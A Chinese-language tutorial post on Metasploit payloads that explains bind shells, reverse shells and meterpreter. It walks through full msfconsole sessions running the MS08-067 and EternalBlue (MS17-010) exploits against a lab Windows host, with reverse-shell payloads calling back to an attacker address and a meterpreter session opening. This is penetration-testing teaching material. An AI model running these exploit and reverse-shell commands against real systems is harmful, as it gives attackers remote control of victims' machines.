payload模块使用(四)

介绍几种常见的payload,并且以漏洞利用的角度探讨它们的功能

 

bind shell

  bind(绑定型)shell用于提供远程shell连接。在成功利用了目标主机上的安全漏洞后,并且成功执行了shellcode程序以后,渗透人员可在目标主机上的特定端口上运行bind shell,以让其他主机继续控制这台主机。攻击人员可以使用基于TCP连接的标准输入输出隧道工具(例如Netcat)连接带被攻破的主机,通过bind shell继续实施控制。它的应用场合与Telnet服务器/客户端十分相似,主要适用于以NAT方式连入网络的渗透人员、攻击人员的设备与目标主机之间有防火墙的情况,即适用于无法从被测主机直接连接到攻击人员主机IP的各种情况。

 

msf5 > use exploit/windows/smb/ms08_067_netapi 
msf5 exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] 192.168.1.14:445 - Automatically detecting the target...

  metasploit通过集成的payload处理程序自动连接到bind shell。我们可以自己编写shellcode。利用exploit程序安装bind  shell,然后再通过Netcat这类第三方工具连接到bind shell。

reverse shell

  reverse(反射型)shell与绑定型(bind)shell截然不同。reverse shell不是在目标机器上绑定端口,被动地受理攻击人员的机器连接,而是采用反弹的方法,让被测主机主动的连接攻击者的IP和端口,并提供一个shell。reverse shell适用于被测主机采用NAT方式连接网络的情况,或者被测主机受防火墙保护而使渗透人员不能从外网直接访问被测主机的各种情况。

 

msf5 > use exploit/windows/smb/ms08_067_netapi 
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell
set PAYLOAD windows/shell/bind_hidden_ipknock_tcp  set PAYLOAD windows/shell/reverse_ord_tcp
set PAYLOAD windows/shell/bind_hidden_tcp          set PAYLOAD windows/shell/reverse_tcp
set PAYLOAD windows/shell/bind_ipv6_tcp            set PAYLOAD windows/shell/reverse_tcp_allports
set PAYLOAD windows/shell/bind_ipv6_tcp_uuid       set PAYLOAD windows/shell/reverse_tcp_dns
set PAYLOAD windows/shell/bind_named_pipe          set PAYLOAD windows/shell/reverse_tcp_rc4
set PAYLOAD windows/shell/bind_nonx_tcp            set PAYLOAD windows/shell/reverse_tcp_uuid
set PAYLOAD windows/shell/bind_tcp                 set PAYLOAD windows/shell/reverse_udp
set PAYLOAD windows/shell/bind_tcp_rc4             set PAYLOAD windows/shell_bind_tcp
set PAYLOAD windows/shell/bind_tcp_uuid            set PAYLOAD windows/shell_hidden_bind_tcp
set PAYLOAD windows/shell/reverse_ipv6_tcp         set PAYLOAD windows/shell_reverse_tcp
set PAYLOAD windows/shell/reverse_nonx_tcp         
msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.14     yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.12:4444 

  注意,在安装reverse shell时需要设置攻击者的IP(LHOST)。

meterpreter

  meterpreter是一种先进的、隐蔽的、多功能的、可动态扩展的payload,它可在目标主机的系统内存里注入DLL(注入的DLL完全不会以文件形式存在)。此外,它还支持在运行期间加载脚本和插件。在漏洞利用的后期阶段,它的动态加载特性极大地拓宽了渗透人员的作业空间,方便了提权、保存系统账号、进行关键记录、驻留性后门顾问、开启远程桌面等各种操作。默认情况下,meterpreter shell会采用全程加密的通行方式。

msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD 15
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.1.14     yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.1.12:4444 
[+] 192.168.1.14:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.14:445 - Connecting to target for exploitation.
[+] 192.168.1.14:445 - Connection established for exploitation.
[+] 192.168.1.14:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.14:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.14:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.14:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.1.14:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.1.14:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.14:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.14:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.14:445 - Starting non-paged pool grooming
[+] 192.168.1.14:445 - Sending SMBv2 buffers
[+] 192.168.1.14:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.14:445 - Sending final SMBv2 buffers.
[*] 192.168.1.14:445 - Sending last fragment of exploit packet!
[*] 192.168.1.14:445 - Receiving response from exploit packet
[+] 192.168.1.14:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.14:445 - Sending egg to corrupted connection.
[*] 192.168.1.14:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:49398) at 2021-02-01 12:13:06 +0800
[+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > dir
Listing: C:\Windows\system32

  

上一篇:MSF系列——永恒之蓝漏洞


下一篇:20165224 陆艺杰 Exp5 MSF基础应用